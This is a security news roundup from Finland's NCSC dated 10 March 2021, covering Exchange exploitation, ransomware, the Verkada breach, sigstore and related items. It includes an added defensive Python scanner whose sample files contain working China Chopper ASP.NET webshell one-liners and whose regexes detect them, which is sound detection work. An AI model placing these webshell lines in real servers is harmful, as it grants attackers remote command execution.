Daily NCSC-FI news followup 2021-03-10

Introducing sigstore: Easy Code Signing & Verification for Supply Chain Integrity

security.googleblog.com/2021/03/introducing-sigstore-easy-code-signing.html One of the fundamental security issues with open source is that it's difficult to know where the software comes from or how it was built, making it susceptible to supply chain attacks. A few recent examples of this include the dependency confusion attack and a malicious RubyGems package used to steal cryptocurrency. Today we welcome the announcement of sigstore, a new project in the Linux Foundation that aims to solve this issue by improving software supply chain integrity and verification.

Warning the World of a Ticking Time Bomb

krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/ On Mar. 5, KrebsOnSecurity broke the news that at least 30,000 organizations and hundreds of thousands globally had been hacked. The same sources who shared those figures say the victim list has grown considerably since then, with many victims compromised by multiple cybercrime groups. Security experts are now trying to alert and assist these victims before malicious hackers launch what many refer to with a mix of dread and anticipation as Stage 2, when the bad guys revisit all these hacked servers and seed them with ransomware or else additional hacking tools for crawling even deeper into victim networks.

Hackers Breach Thousands of Security Cameras, Exposing Tesla, Jails, Hospitals

www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams A group of hackers say they breached a massive trove of security-camera data collected by Silicon Valley startup Verkada Inc., gaining access to live feeds of 150,000 surveillance cameras inside hospitals, companies, police departments, prisons and schools. Companies whose footage was exposed include carmaker Tesla Inc. and software provider Cloudflare Inc. In addition, hackers were able to view video from inside women's health clinics, psychiatric hospitals and the offices of Verkada itself.

OVH cloud datacenter destroyed by fire

blog.malwarebytes.com/malwarebytes-news/2021/03/ovh-cloud-datacenter-destroyed-by-fire/ A fire at one of the OVH sites has destroyed one datacenter and knocked two others offline. It took 100 firefighters and 43 fire trucks to fight the fire in the five-story building. Even though the fire department was quick to respond, and the fire was brought under control relatively quickly, the impact has been big. In a press statement OVH promised to "communicate as transparently as possible on the progress of our analyses and the implementation of solutions". Also:

www.bleepingcomputer.com/news/technology/ovh-data-center-burns-down-knocking-major-sites-offline/

www.datacenterdynamics.com/en/news/fire-destroys-ovhclouds-sbg2-data-center-strasbourg/

Ad blocker with miner included

securelist.com/ad-blocker-with-miner-included/101105/ Some time ago, we discovered a number of fake apps delivering a Monero cryptocurrency miner to user computers. They are distributed through malicious websites that may turn up in the victim's search results. By the look of it, it appears to be a continuation of the summer campaign covered by our colleagues from Avast. Back then, cybercriminals distributed malware under the guise of the Malwarebytes antivirus installer.

Exchange servers under siege from at least 10 APT groups

www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ ESET Research has found LuckyMouse, Tick, Winnti Group, and Calypso, among others, are likely using the recent Microsoft Exchange vulnerabilities to compromise email servers all around the world. On 2021-03-02, Microsoft released out-of-band patches for Microsoft Exchange Server 2013, 2016 and 2019. These security updates fixed a pre-authentication remote code execution (RCE) vulnerability chain (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows an attacker to take over any reachable Exchange server, without even knowing any valid account credentials. We have already detected webshells on more than 5,000 email servers as of the time of writing, and according to public sources, several important organizations, such as the European Banking Authority, suffered from this attack.

Ryuk ransomware hits 700 Spanish government labor agency offices

www.bleepingcomputer.com/news/security/ryuk-ransomware-hits-700-spanish-government-labor-agency-offices/ The systems of SEPE, the Spanish government agency for labor, were taken down following a ransomware attack that hit more than 700 agency offices across Spain. “Currently, work is being done with the objective of restoring priority services as soon as possible, among which is the portal of the State Public Employment Service and then gradually other services to citizens, companies, benefit and employment offices,” an announcement on the agency’s website reads.

FBI-CISA Joint Advisory on Compromise of Microsoft Exchange Server

us-cert.cisa.gov/ncas/current-activity/2021/03/10/fbi-cisa-joint-advisory-compromise-microsoft-exchange-server CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) to address recently disclosed vulnerabilities in Microsoft Exchange Server. CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack.

Norwegian parliament (Storting) hit by a new data breach via Microsoft Exchange vulnerabilities

www.hs.fi/talous/art-2000007852716.html THE NORWEGIAN parliament, the Storting, has been the target of a new data breach. The previous attack was carried out seven months ago and was at the time attributed to the Russian hacker group known as Fancy Bear. The Storting says in its statement that the scope and perpetrators of the new breach are not yet known, but it is not believed to be connected to the previous attack. The intruders exploited vulnerabilities in Microsoft Exchange servers.

Researchers Unveil New Linux Malware Linked to Chinese Hackers

thehackernews.com/2021/03/researchers-unveil-new-linux-malware.html Cybersecurity researchers on Wednesday shed light on a new sophisticated backdoor targeting Linux endpoints and servers that’s believed to be the work of Chinese nation-state actors. Dubbed “RedXOR” by Intezer, the backdoor masquerades as a polkit daemon, with similarities found between the malware and those previously associated with the Winnti Umbrella (or Axiom) threat group such as PWNLNX, XOR.DDOS and Groundhog.

Cyber criminals targeting hospitals are ‘playing with lives’ and must be stopped, report warns

www.zdnet.com/article/cyber-criminals-targeting-hospitals-are-playing-with-lives-and-must-be-stopped-report-warns/ Cyberattacks targeting healthcare are putting patients at unnecessary risk and more must be done to hold the cyber criminals involved to account, warns the CyberPeace Institute, an international body dedicated to protecting the vulnerable in cyberspace. The healthcare industry has been under increased strain over the past year due to the impact of the COVID-19 pandemic, which has prompted some cyber criminals to conduct ransomware campaigns and other cyberattacks.

Supo: Foreign intelligence services are using Finnish routers for cyber espionage

www.is.fi/digitoday/tietoturva/art-2000007851807.html THE FINNISH SECURITY AND INTELLIGENCE SERVICE (Supo) says that foreign intelligence services have used the network routers of dozens of Finnish companies and private individuals for cyber espionage. Supo urges owners to check the settings of their routers and other network-connected devices. Supo has already been in contact with some of the companies and individuals whose devices were broken into. According to Supo, the perpetrators used the devices only as stepping stones to reach the actual espionage target; obtaining the data stored on the devices was not their goal. Also:

www.tivi.fi/uutiset/tv/9cf376bc-e5bf-49c7-8b97-e0661b8e9389. Press release:

supo.fi/-/ulkomaiset-tiedustelupalvelut-kayttavat-yritysten-ja-yksityishenkiloiden-verkkoreitittimia-kybervakoiluun

Serious vulnerability in Windows' default browsers, update immediately

www.tivi.fi/uutiset/tv/61267ef1-7e3d-4ec9-ba30-f37f32df14cb The National Cyber Security Centre Finland (Kyberturvallisuuskeskus) reports a vulnerability found in the Internet Explorer and Edge browsers that can lead to memory corruption. The browsers are the default browsers of the Windows operating system. The vulnerability allows attackers to execute arbitrary commands on the user's machine and obtain confidential information. In its March 2021 update rollup, Microsoft released patches for the Edge and Internet Explorer browsers (versions 9 and 11) that fix the vulnerability. Also:

arstechnica.com/gadgets/2021/03/microsoft-patches-critical-0day-that-north-korea-used-to-target-researchers/

Guidance on Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise

us-cert.cisa.gov/ncas/current-activity/2021/03/09/guidance-remediating-networks-affected-solarwinds-and-active Since December 2020, CISA has been responding to a significant cybersecurity incident involving an advanced persistent threat (APT) actor targeting networks of multiple U.S. government agencies, critical infrastructure entities, and private sector organizations. The APT actor added malicious code to multiple versions of the SolarWinds Orion platform and leveraged it, as well as other techniques, for initial access to enterprise networks. After gaining persistent, invasive access to select organizations' enterprise networks, the APT actor targeted their federated identity solutions and their Active Directory/M365 environments.

Cyberattackers Exploiting Critical WordPress Plugin Bug

threatpost.com/cyberattackers-exploiting-critical-wordpress-plugin-bug/164663/ The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued. The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it's being actively attacked in the wild. The plugin, which has more than 30,000 active installations according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.

Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells

unit42.paloaltonetworks.com/china-chopper-webshell/ Microsoft recently released patches for a number of zero-day Microsoft Exchange Server vulnerabilities that are actively being exploited in the wild by HAFNIUM, a suspected state-sponsored group operating out of China. We provide an overview of the China Chopper webshell, a backdoor which has been observed being dropped in these attacks. We also analyze incidental artifacts, such as metadata, created by the attacks themselves, which allow us to collect information and better understand the nature and methodology of the attackers.
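The ESET item above reports webshells on more than 5,000 Exchange servers, and the Unit 42 write-up describes the China Chopper webshell being dropped in these attacks. As an added example, not code from either write-up, here is a small Python scanner for the well-known ASP.NET China Chopper one-liner form, eval(Request.Item["<password>"], "unsafe"), run over a constructed sample tree that mimics Exchange's web directories. The regexes, the sample file names and contents are my own assumptions; a hit is a lead for manual review of the file and the IIS logs around its creation time, not proof of compromise on its own.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# China Chopper ASP.NET one-liner: eval(Request.Item["<pw>"], "unsafe").
# This regex is my own (not from the Unit 42 write-up); it also accepts the
# Request["<pw>"], Request.Form[...] and Request.QueryString[...] variants
# and tolerates whitespace and single quotes.
CHOPPER_RE = re.compile(
    rb"""eval\s*\(\s*Request(?:\.Item|\.Form|\.QueryString)?\s*\[\s*["'][^"']+["']\s*\]\s*,\s*["']unsafe["']\s*\)""",
    re.IGNORECASE,
)

# Broader indicator for other JScript webshells: a server-side <script runat="server">
# block that reaches eval(). Noisier than CHOPPER_RE; treat as a secondary signal.
SCRIPT_EVAL_RE = re.compile(
    rb"""<script[^>]*runat\s*=\s*["']?server["']?[^>]*>.*?eval\s*\(""",
    re.IGNORECASE | re.DOTALL,
)


def scan_file(path: Path) -> list[str]:
    """Return the list of indicator names matched in one file (empty if clean)."""
    data = path.read_bytes()
    hits: list[str] = []
    if CHOPPER_RE.search(data):
        hits.append("china_chopper_eval")
    if SCRIPT_EVAL_RE.search(data):
        hits.append("server_script_eval")
    return hits


def scan_tree(root: Path, exts: tuple[str, ...] = (".aspx", ".asp", ".ashx", ".asmx")) -> dict[str, list[str]]:
    """Walk a web root and map relative path -> indicators for every file with a hit."""
    findings: dict[str, list[str]] = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            hits = scan_file(p)
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample tree (assumption: file names and contents are made up for the demo;
# only the directory layout follows Exchange's FrontEnd/ClientAccess structure).
SAMPLES: dict[str, bytes] = {
    "FrontEnd/HttpProxy/owa/auth/errorFF.aspx":
        b'<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    "ClientAccess/OAB/help.aspx":
        b'<script language="JScript" runat="server">function Page_Load(){eval(Request["p"],"unsafe");}</script>',
    "FrontEnd/HttpProxy/owa/auth/logon.aspx":
        b'<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>',
}


def build_samples(root: Path) -> None:
    """Write the constructed sample files under root."""
    for rel, content in SAMPLES.items():
        f = root / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_bytes(content)


def demo() -> dict[str, list[str]]:
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_samples(root)
        return scan_tree(root)


if __name__ == "__main__":
    # On a real server point scan_tree() at the Exchange install's FrontEnd and
    # ClientAccess directories (and inetpub\wwwroot) instead of the sample tree.
    for path, indicators in demo().items():
        print(f"{path}: {', '.join(indicators)}")
```

The scanner deliberately matches on the eval-of-request-parameter shape rather than on a specific file name, since the attackers in these campaigns chose names freely; pair it with a diff of the web directories against a clean install of the same Exchange build, because a benign-looking file name is no evidence of a benign file.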

We often hear about cyberattacks, cyber operations, and malware infections that target computer systems or smartphones. Attacks against civilian infrastructure facilities such as hospitals, water sanitation systems, and the energy sector similarly get a lot of airtime.

www.wired.com/story/dire-possibility-cyberattacks-weapons-systems/ But there is another type of high-stakes system that gets much less attention: weapons systems. These include guided missiles, missile and anti-missile systems, tanks, fighter jets, and more, all of which are computerized and possibly networked. We can imagine that weapons systems contain security vulnerabilities similar to most other information systems, including serious ones.
